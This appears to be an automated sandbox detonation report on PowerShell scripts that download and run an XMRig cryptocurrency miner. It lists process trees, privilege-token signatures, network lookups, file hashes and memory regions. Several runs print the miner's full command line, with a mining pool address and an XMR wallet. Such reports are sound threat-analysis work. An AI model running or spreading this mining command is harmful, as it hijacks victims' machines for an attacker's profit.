N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 122.10.44.20.in-addr.arpa udp

Files

memory/4008-0-0x00007FFADFF23000-0x00007FFADFF25000-memory.dmp

memory/4008-4-0x000001AD74590000-0x000001AD745B2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cbbuhwr3.ujq.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4008-11-0x00007FFADFF20000-0x00007FFAE09E1000-memory.dmp

memory/4008-12-0x00007FFADFF20000-0x00007FFAE09E1000-memory.dmp

memory/4008-14-0x00007FFADFF20000-0x00007FFAE09E1000-memory.dmp

memory/4008-15-0x000001AD74C60000-0x000001AD74C72000-memory.dmp

memory/4008-16-0x000001AD745C0000-0x000001AD745CA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4868-47-0x000001FC7FFD0000-0x000001FC7FFF0000-memory.dmp

memory/4868-48-0x000001FC017D0000-0x000001FC017F0000-memory.dmp

memory/4868-49-0x00007FF7F5A70000-0x00007FF7F66A3000-memory.dmp

memory/4868-51-0x000001FC01810000-0x000001FC01830000-memory.dmp

memory/4868-50-0x000001FC017F0000-0x000001FC01810000-memory.dmp

memory/4868-52-0x00007FF7F5A70000-0x00007FF7F66A3000-memory.dmp

memory/4008-53-0x00007FFADFF23000-0x00007FFADFF25000-memory.dmp

memory/4008-54-0x00007FFADFF20000-0x00007FFAE09E1000-memory.dmp

memory/4868-55-0x00007FF7F5A70000-0x00007FF7F66A3000-memory.dmp

memory/4008-56-0x00007FFADFF20000-0x00007FFAE09E1000-memory.dmp

memory/4868-59-0x000001FC01810000-0x000001FC01830000-memory.dmp

memory/4868-58-0x000001FC017F0000-0x000001FC01810000-memory.dmp

memory/4868-57-0x00007FF7F5A70000-0x00007FF7F66A3000-memory.dmp

memory/4868-60-0x00007FF7F5A70000-0x00007FF7F66A3000-memory.dmp

memory/4868-61-0x00007FF7F5A70000-0x00007FF7F66A3000-memory.dmp

memory/4868-62-0x00007FF7F5A70000-0x00007FF7F66A3000-memory.dmp

memory/4868-63-0x00007FF7F5A70000-0x00007FF7F66A3000-memory.dmp

memory/4868-64-0x00007FF7F5A70000-0x00007FF7F66A3000-memory.dmp

memory/4868-65-0x00007FF7F5A70000-0x00007FF7F66A3000-memory.dmp

memory/4868-66-0x00007FF7F5A70000-0x00007FF7F66A3000-memory.dmp

memory/4868-67-0x00007FF7F5A70000-0x00007FF7F66A3000-memory.dmp

memory/4868-68-0x00007FF7F5A70000-0x00007FF7F66A3000-memory.dmp

memory/4868-69-0x00007FF7F5A70000-0x00007FF7F66A3000-memory.dmp

memory/4868-70-0x00007FF7F5A70000-0x00007FF7F66A3000-memory.dmp

memory/4868-71-0x00007FF7F5A70000-0x00007FF7F66A3000-memory.dmp

memory/4868-72-0x00007FF7F5A70000-0x00007FF7F66A3000-memory.dmp

memory/4868-73-0x00007FF7F5A70000-0x00007FF7F66A3000-memory.dmp

memory/4868-74-0x00007FF7F5A70000-0x00007FF7F66A3000-memory.dmp

memory/4868-75-0x00007FF7F5A70000-0x00007FF7F66A3000-memory.dmp

memory/4868-76-0x00007FF7F5A70000-0x00007FF7F66A3000-memory.dmp

memory/4868-77-0x00007FF7F5A70000-0x00007FF7F66A3000-memory.dmp

memory/4868-78-0x00007FF7F5A70000-0x00007FF7F66A3000-memory.dmp

memory/4868-79-0x00007FF7F5A70000-0x00007FF7F66A3000-memory.dmp

memory/4868-80-0x00007FF7F5A70000-0x00007FF7F66A3000-memory.dmp

memory/4868-81-0x00007FF7F5A70000-0x00007FF7F66A3000-memory.dmp

memory/4868-82-0x00007FF7F5A70000-0x00007FF7F66A3000-memory.dmp

memory/4868-83-0x00007FF7F5A70000-0x00007FF7F66A3000-memory.dmp

memory/4868-84-0x00007FF7F5A70000-0x00007FF7F66A3000-memory.dmp

memory/4868-85-0x00007FF7F5A70000-0x00007FF7F66A3000-memory.dmp

memory/4868-86-0x00007FF7F5A70000-0x00007FF7F66A3000-memory.dmp

memory/4868-87-0x00007FF7F5A70000-0x00007FF7F66A3000-memory.dmp

memory/4868-88-0x00007FF7F5A70000-0x00007FF7F66A3000-memory.dmp

memory/4868-89-0x00007FF7F5A70000-0x00007FF7F66A3000-memory.dmp

memory/4868-90-0x00007FF7F5A70000-0x00007FF7F66A3000-memory.dmp

memory/4868-91-0x00007FF7F5A70000-0x00007FF7F66A3000-memory.dmp

memory/4868-92-0x00007FF7F5A70000-0x00007FF7F66A3000-memory.dmp

memory/4868-93-0x00007FF7F5A70000-0x00007FF7F66A3000-memory.dmp

memory/4868-94-0x00007FF7F5A70000-0x00007FF7F66A3000-memory.dmp

memory/4868-95-0x00007FF7F5A70000-0x00007FF7F66A3000-memory.dmp

memory/4868-96-0x00007FF7F5A70000-0x00007FF7F66A3000-memory.dmp

memory/4868-97-0x00007FF7F5A70000-0x00007FF7F66A3000-memory.dmp

memory/4868-98-0x00007FF7F5A70000-0x00007FF7F66A3000-memory.dmp

memory/4868-99-0x00007FF7F5A70000-0x00007FF7F66A3000-memory.dmp

memory/4868-100-0x00007FF7F5A70000-0x00007FF7F66A3000-memory.dmp

memory/4868-101-0x00007FF7F5A70000-0x00007FF7F66A3000-memory.dmp

memory/4868-102-0x00007FF7F5A70000-0x00007FF7F66A3000-memory.dmp

memory/4868-103-0x00007FF7F5A70000-0x00007FF7F66A3000-memory.dmp

memory/4868-104-0x00007FF7F5A70000-0x00007FF7F66A3000-memory.dmp

memory/4868-105-0x00007FF7F5A70000-0x00007FF7F66A3000-memory.dmp

memory/4868-106-0x00007FF7F5A70000-0x00007FF7F66A3000-memory.dmp

memory/4868-107-0x00007FF7F5A70000-0x00007FF7F66A3000-memory.dmp

memory/4868-108-0x00007FF7F5A70000-0x00007FF7F66A3000-memory.dmp

memory/4868-109-0x00007FF7F5A70000-0x00007FF7F66A3000-memory.dmp

memory/4868-110-0x00007FF7F5A70000-0x00007FF7F66A3000-memory.dmp

memory/4868-111-0x00007FF7F5A70000-0x00007FF7F66A3000-memory.dmp

memory/4868-112-0x00007FF7F5A70000-0x00007FF7F66A3000-memory.dmp

memory/4868-113-0x00007FF7F5A70000-0x00007FF7F66A3000-memory.dmp

memory/4868-114-0x00007FF7F5A70000-0x00007FF7F66A3000-memory.dmp

memory/4868-115-0x00007FF7F5A70000-0x00007FF7F66A3000-memory.dmp

memory/4868-116-0x00007FF7F5A70000-0x00007FF7F66A3000-memory.dmp

memory/4868-117-0x00007FF7F5A70000-0x00007FF7F66A3000-memory.dmp

memory/4868-118-0x00007FF7F5A70000-0x00007FF7F66A3000-memory.dmp

Analysis: behavioral29

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:56

Platform

win7-20240419-en

Max time kernel

1562s

Max time network

1562s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Network

N/A

Files

memory/2300-4-0x000007FEF559E000-0x000007FEF559F000-memory.dmp

memory/2300-5-0x000000001B6D0000-0x000000001B9B2000-memory.dmp

memory/2300-6-0x0000000001F00000-0x0000000001F08000-memory.dmp

memory/2300-8-0x000007FEF52E0000-0x000007FEF5C7D000-memory.dmp

memory/2300-7-0x000007FEF52E0000-0x000007FEF5C7D000-memory.dmp

memory/2300-9-0x000007FEF52E0000-0x000007FEF5C7D000-memory.dmp

memory/2300-10-0x000007FEF52E0000-0x000007FEF5C7D000-memory.dmp

memory/2300-11-0x000007FEF52E0000-0x000007FEF5C7D000-memory.dmp

Analysis: behavioral32

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:02

Platform

win11-20240508-en

Max time kernel

1799s

Max time network

1795s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/1216-0-0x00007FFD081D3000-0x00007FFD081D5000-memory.dmp

memory/1216-9-0x000001E3EF660000-0x000001E3EF682000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_a42jyde1.v10.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1216-10-0x00007FFD081D0000-0x00007FFD08C92000-memory.dmp

memory/1216-11-0x00007FFD081D0000-0x00007FFD08C92000-memory.dmp

memory/1216-12-0x00007FFD081D0000-0x00007FFD08C92000-memory.dmp

memory/1216-14-0x000001E3EF840000-0x000001E3EF852000-memory.dmp

memory/1216-15-0x000001E3EF820000-0x000001E3EF82A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1128-46-0x0000020A18A90000-0x0000020A18AB0000-memory.dmp

memory/1128-47-0x0000020A18AE0000-0x0000020A18B00000-memory.dmp

memory/1128-48-0x00007FF661980000-0x00007FF6625B3000-memory.dmp

memory/1216-49-0x00007FFD081D3000-0x00007FFD081D5000-memory.dmp

memory/1216-50-0x00007FFD081D0000-0x00007FFD08C92000-memory.dmp

memory/1128-52-0x0000020A1A3B0000-0x0000020A1A3D0000-memory.dmp

memory/1128-53-0x0000020A1A3D0000-0x0000020A1A3F0000-memory.dmp

memory/1128-51-0x00007FF661980000-0x00007FF6625B3000-memory.dmp

memory/1216-54-0x00007FFD081D0000-0x00007FFD08C92000-memory.dmp

memory/1128-55-0x00007FF661980000-0x00007FF6625B3000-memory.dmp

memory/1128-56-0x00007FF661980000-0x00007FF6625B3000-memory.dmp

memory/1128-58-0x0000020A1A3D0000-0x0000020A1A3F0000-memory.dmp

memory/1128-57-0x0000020A1A3B0000-0x0000020A1A3D0000-memory.dmp

memory/1128-59-0x00007FF661980000-0x00007FF6625B3000-memory.dmp

memory/1128-60-0x00007FF661980000-0x00007FF6625B3000-memory.dmp

memory/1128-61-0x00007FF661980000-0x00007FF6625B3000-memory.dmp

memory/1128-62-0x00007FF661980000-0x00007FF6625B3000-memory.dmp

memory/1128-63-0x00007FF661980000-0x00007FF6625B3000-memory.dmp

memory/1128-64-0x00007FF661980000-0x00007FF6625B3000-memory.dmp

memory/1128-65-0x00007FF661980000-0x00007FF6625B3000-memory.dmp

memory/1128-66-0x00007FF661980000-0x00007FF6625B3000-memory.dmp

memory/1128-67-0x00007FF661980000-0x00007FF6625B3000-memory.dmp

memory/1128-68-0x00007FF661980000-0x00007FF6625B3000-memory.dmp

memory/1128-69-0x00007FF661980000-0x00007FF6625B3000-memory.dmp

memory/1128-70-0x00007FF661980000-0x00007FF6625B3000-memory.dmp

memory/1128-71-0x00007FF661980000-0x00007FF6625B3000-memory.dmp

memory/1128-72-0x00007FF661980000-0x00007FF6625B3000-memory.dmp

memory/1128-73-0x00007FF661980000-0x00007FF6625B3000-memory.dmp

memory/1128-74-0x00007FF661980000-0x00007FF6625B3000-memory.dmp

memory/1128-75-0x00007FF661980000-0x00007FF6625B3000-memory.dmp

memory/1128-76-0x00007FF661980000-0x00007FF6625B3000-memory.dmp

memory/1128-77-0x00007FF661980000-0x00007FF6625B3000-memory.dmp

memory/1128-78-0x00007FF661980000-0x00007FF6625B3000-memory.dmp

memory/1128-79-0x00007FF661980000-0x00007FF6625B3000-memory.dmp

memory/1128-80-0x00007FF661980000-0x00007FF6625B3000-memory.dmp

memory/1128-81-0x00007FF661980000-0x00007FF6625B3000-memory.dmp

memory/1128-82-0x00007FF661980000-0x00007FF6625B3000-memory.dmp

memory/1128-83-0x00007FF661980000-0x00007FF6625B3000-memory.dmp

memory/1128-84-0x00007FF661980000-0x00007FF6625B3000-memory.dmp

memory/1128-85-0x00007FF661980000-0x00007FF6625B3000-memory.dmp

memory/1128-86-0x00007FF661980000-0x00007FF6625B3000-memory.dmp

memory/1128-87-0x00007FF661980000-0x00007FF6625B3000-memory.dmp

memory/1128-88-0x00007FF661980000-0x00007FF6625B3000-memory.dmp

memory/1128-89-0x00007FF661980000-0x00007FF6625B3000-memory.dmp

memory/1128-90-0x00007FF661980000-0x00007FF6625B3000-memory.dmp

memory/1128-91-0x00007FF661980000-0x00007FF6625B3000-memory.dmp

memory/1128-92-0x00007FF661980000-0x00007FF6625B3000-memory.dmp

memory/1128-93-0x00007FF661980000-0x00007FF6625B3000-memory.dmp

memory/1128-94-0x00007FF661980000-0x00007FF6625B3000-memory.dmp

memory/1128-95-0x00007FF661980000-0x00007FF6625B3000-memory.dmp

memory/1128-96-0x00007FF661980000-0x00007FF6625B3000-memory.dmp

memory/1128-97-0x00007FF661980000-0x00007FF6625B3000-memory.dmp

memory/1128-98-0x00007FF661980000-0x00007FF6625B3000-memory.dmp

memory/1128-99-0x00007FF661980000-0x00007FF6625B3000-memory.dmp

memory/1128-100-0x00007FF661980000-0x00007FF6625B3000-memory.dmp

memory/1128-101-0x00007FF661980000-0x00007FF6625B3000-memory.dmp

memory/1128-102-0x00007FF661980000-0x00007FF6625B3000-memory.dmp

memory/1128-103-0x00007FF661980000-0x00007FF6625B3000-memory.dmp

memory/1128-104-0x00007FF661980000-0x00007FF6625B3000-memory.dmp

memory/1128-105-0x00007FF661980000-0x00007FF6625B3000-memory.dmp

memory/1128-106-0x00007FF661980000-0x00007FF6625B3000-memory.dmp

memory/1128-107-0x00007FF661980000-0x00007FF6625B3000-memory.dmp

memory/1128-108-0x00007FF661980000-0x00007FF6625B3000-memory.dmp

memory/1128-109-0x00007FF661980000-0x00007FF6625B3000-memory.dmp

memory/1128-110-0x00007FF661980000-0x00007FF6625B3000-memory.dmp

memory/1128-111-0x00007FF661980000-0x00007FF6625B3000-memory.dmp

memory/1128-112-0x00007FF661980000-0x00007FF6625B3000-memory.dmp

memory/1128-113-0x00007FF661980000-0x00007FF6625B3000-memory.dmp

memory/1128-114-0x00007FF661980000-0x00007FF6625B3000-memory.dmp

memory/1128-115-0x00007FF661980000-0x00007FF6625B3000-memory.dmp

memory/1128-116-0x00007FF661980000-0x00007FF6625B3000-memory.dmp

memory/1128-117-0x00007FF661980000-0x00007FF6625B3000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:31

Platform

win10-20240404-en

Max time kernel

1796s

Max time network

1754s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 40.173.79.40.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

memory/4536-4-0x00007FFC29290000-0x00007FFC2946B000-memory.dmp

memory/4536-5-0x00007FFC29290000-0x00007FFC2946B000-memory.dmp

memory/4536-6-0x00007FFC29290000-0x00007FFC2946B000-memory.dmp

memory/4536-7-0x000002C0F5130000-0x000002C0F5152000-memory.dmp

memory/4536-10-0x000002C0F5860000-0x000002C0F58D6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_y0vvt4us.tau.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4536-25-0x00007FFC29290000-0x00007FFC2946B000-memory.dmp

memory/4536-48-0x000002C0F5160000-0x000002C0F5172000-memory.dmp

memory/4536-61-0x000002C0F5110000-0x000002C0F511A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2032-90-0x000002874CAD0000-0x000002874CAF0000-memory.dmp

memory/4536-91-0x00007FFC29290000-0x00007FFC2946B000-memory.dmp

memory/4536-93-0x00007FFC29290000-0x00007FFC2946B000-memory.dmp

memory/2032-92-0x00007FF61D4E0000-0x00007FF61E113000-memory.dmp

memory/4536-95-0x00007FFC29290000-0x00007FFC2946B000-memory.dmp

memory/2032-94-0x00007FF61D4E0000-0x00007FF61E113000-memory.dmp

memory/2032-96-0x00007FF61D4E0000-0x00007FF61E113000-memory.dmp

memory/2032-97-0x00007FF61D4E0000-0x00007FF61E113000-memory.dmp

memory/2032-98-0x00007FF61D4E0000-0x00007FF61E113000-memory.dmp

memory/2032-99-0x00007FF61D4E0000-0x00007FF61E113000-memory.dmp

memory/2032-100-0x00007FF61D4E0000-0x00007FF61E113000-memory.dmp

memory/2032-101-0x00007FF61D4E0000-0x00007FF61E113000-memory.dmp

memory/2032-102-0x00007FF61D4E0000-0x00007FF61E113000-memory.dmp

